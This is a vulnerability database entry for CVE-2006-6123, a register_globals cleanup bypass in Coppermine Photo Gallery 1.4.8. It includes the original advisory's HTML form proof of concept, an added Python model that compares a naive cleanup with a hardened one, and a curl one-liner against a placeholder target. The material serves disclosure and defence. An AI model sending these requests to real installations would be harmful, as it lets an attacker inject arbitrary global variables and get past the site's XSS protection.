Coppermine Photo Gallery Parameter Cleanup (register_globals) Bypass Vulnerability

Vulnerability ID: 1192777
Vulnerability type: Unknown
Published: 2006-11-26
Updated: 2006-11-26
CVE: CVE-2006-6123
CNNVD ID: CNNVD-200611-419
Platform: N/A
CVSS score: 2.6
|Vulnerability sources
https://www.securityfocus.com/bid/87211
https://cxsecurity.com/issue/WLB-2006110116
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-419
|Vulnerability details
Coppermine Photo Gallery (CPG) 1.4.8 stable, when register_globals is enabled, allows a remote attacker to define variables in the global scope via a query string that also carries a separate _GET, _REQUEST or other reserved-name parameter. The protection routine does not unset such a parameter, and its presence prevents the original variables from being detected, so the attacker bypasses the XSS protection and sets arbitrary variables.
|Exploit
---------------- Summary ----------------
Software: CPG Coppermine Photo Gallery
Software's Web Site: http://coppermine.sourceforge.net/
Versions: 1.4.8.stable
Class: Remote
Status: Unpatched
Exploit: Available
Discovered by: imei addmimistrator
Risk Level: High
---------------- Description ----------------
Coppermine Photo Gallery has a logical design fault that results in bypassing the anti-XSS-injection RegGlobal system.

This is because the process that cleans user-supplied data checks whether any variable exists in the query strings (or the like); if so, it deletes that variable. Because of this approach we can delete the predefined variables (e.g. _GET & _POST) that defined our arbitrary variables before they are deleted, and the cleanup system is bypassed with this trick.
Imagine that register_globals is on. You request a URL with these parameters in a mixed GET and POST request:

<form method="post" action="cpg/?MyVar=value">
<input name="_GET" type="hidden">
<input name="_REQUEST" type="hidden">
<input type="submit"></form>

MyVar will be added as a variable with an arbitrary value before the PHP script handles the request (because of register_globals), and once the script takes over, the predefined _GET & _REQUEST variables will be deleted. So our variable is inaccessible for checking and deleting, but it exists in the global scope.
Don't forget that if you would like to pass some other standard parameters to the program, you should not use GET after this, but POST, for example. I mean that you inject your parameter with the GET array and pass the standard parameters (e.g. pic number or page number) with POST or so... BTW, you should use just one of these arrays at a time.
Because of this bug you can create your own parameters that will be present later in the source code.
---------------- See Also ----------------
{include/init.inc.php} lines 40-101
/* because of the size of the code I do not include it here */
---------------- Exploit ----------------
<form method="post" action="cpg/?MyVar=value">
<input name="_GET" type="hidden">
<input name="_REQUEST" type="hidden">
<input type="submit"></form>
---------------- Conditions ----------------
Register Globals Should Be ON
---------------- Credit ----------------
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
imei(4}Kapda(O}IR
www.myimei.com
myimei.com/security 
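
The following is an added Python model of the cleanup logic the advisory describes. It is not Coppermine's code (the real routine in include/init.inc.php is not reproduced on this page) and it models PHP's register_globals merge rather than running PHP; `build_globals`, `naive_cleanup`, `hardened_cleanup`, `attack_survives` and the sample request values are assumptions for illustration. It replays the advisory's request (GET `MyVar=value` plus POST fields named `_GET` and `_REQUEST`) against the flawed cleanup and against a hardened one that aborts when a request array is no longer an array or a key carries a reserved name. It goes one step beyond the advisory by also showing why posting `_GET` alone is not enough: `_REQUEST` still lists `MyVar`, so the cleanup would find it.

```python
"""Model of the register_globals cleanup bypass (added example, not Coppermine code)."""

# Names PHP reserves for its request arrays. In this model only "GLOBALS"
# is shielded from register_globals (as PHP itself did); "_GET" and the
# other arrays can be clobbered by a request parameter of the same name.
RESERVED = {"GLOBALS", "_GET", "_POST", "_COOKIE", "_REQUEST",
            "_SERVER", "_ENV", "_FILES", "_SESSION"}


class TamperedRequest(Exception):
    """Raised by the hardened cleanup when a request carries reserved names."""


def build_globals(get, post, register_globals=True):
    """Build the global symbol table for one request (constructed model).

    The request arrays are installed first; with register_globals on, every
    parameter is then merged in GET-then-POST order and overwrites any
    existing global of that name except GLOBALS.
    """
    table = {"_GET": dict(get), "_POST": dict(post), "_REQUEST": {**get, **post}}
    if register_globals:
        for source in (get, post):
            for name, value in source.items():
                if name != "GLOBALS":
                    table[name] = value
    return table


def naive_cleanup(table):
    """The flawed pattern the advisory describes: walk each request array and
    unset the global that shares each key's name. Once a parameter named
    _GET or _REQUEST has replaced the array with a string, there is nothing
    left to walk and the injected global survives."""
    for array_name in ("_GET", "_POST", "_REQUEST"):
        source = table.get(array_name)
        if not isinstance(source, dict):
            continue
        for key in list(source):
            table.pop(key, None)


def hardened_cleanup(table):
    """Cleanup that cannot be talked out of its job. Every request array must
    still be an array and no key may carry a reserved name; any violation
    aborts the request. Only then are same-named globals removed, and the
    reserved entries themselves are never touched."""
    for array_name in ("_GET", "_POST", "_REQUEST"):
        source = table.get(array_name)
        if not isinstance(source, dict):
            raise TamperedRequest(f"{array_name} is no longer an array")
        for key in list(source):
            if key in RESERVED:
                raise TamperedRequest(f"reserved name {key!r} in {array_name}")
            table.pop(key, None)


def attack_survives(cleanup, register_globals=True):
    """Replay the advisory's request: GET ?MyVar=value plus POST fields named
    _GET and _REQUEST (constructed input). Return True if MyVar is still a
    global after the cleanup ran, i.e. the bypass worked."""
    get = {"MyVar": "value"}
    post = {"_GET": "", "_REQUEST": ""}
    table = build_globals(get, post, register_globals)
    if register_globals:  # such routines only ran when register_globals was on
        try:
            cleanup(table)
        except TamperedRequest:
            return False
    return table.get("MyVar") == "value"


def benign_request_is_scrubbed(cleanup):
    """A normal request (?pid=5) must lose its register_globals copy of pid
    under either cleanup, so hardening does not break ordinary pages."""
    table = build_globals({"pid": "5"}, {})
    cleanup(table)
    return "pid" not in table and table["_GET"] == {"pid": "5"}


if __name__ == "__main__":
    print("naive cleanup bypassed:   ", attack_survives(naive_cleanup))
    print("hardened cleanup bypassed:", attack_survives(hardened_cleanup))
    print("register_globals=Off:     ", attack_survives(naive_cleanup, False))
```

Run it directly to see the three cases. From the command line, the equivalent of the advisory's form is `curl -d '_GET=&_REQUEST=' 'http://target/cpg/?MyVar=value'` (hostname assumed). The model's conclusion is the only robust one for this bug class: turn register_globals off (the `register_globals=False` case), and as defence in depth reject any request that names a superglobal instead of trying to clean around it.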

|Affected products
Coppermine: Coppermine Photo Gallery 1.4.8 Stable
|References

Source: XF; Name: coppermine-init-security-bypass (27376); Link: http://xforce.iss.net/xforce/xfdb/27376
Source: OSVDB; Name: 27618; Link: http://www.osvdb.org/27618
Source: svn.sourceforge.net; Link: http://svn.sourceforge.net/viewvc/coppermine?view=rev&revision=3133
Source: SECUNIA; Name: 20597; Link: http://secunia.com/advisories/20597
Source: MISC; Link: http://myimei.com/security/2006-06-20/coppermine-148parameter-cleanup-system-bypassregistering-global-varables.html
Source: BUGTRAQ; Name: 20060623 [KAPDA] Coppermine 1.4.8 ~ Parameter Cleanup System ByPass ~ Registering Global Variables; Link: http://archives.neohapsis.com/archives/bugtraq/2006-06/0482.html
Source: SREASON; Name: 1914; Link: http://securityreason.com/securityalert/1914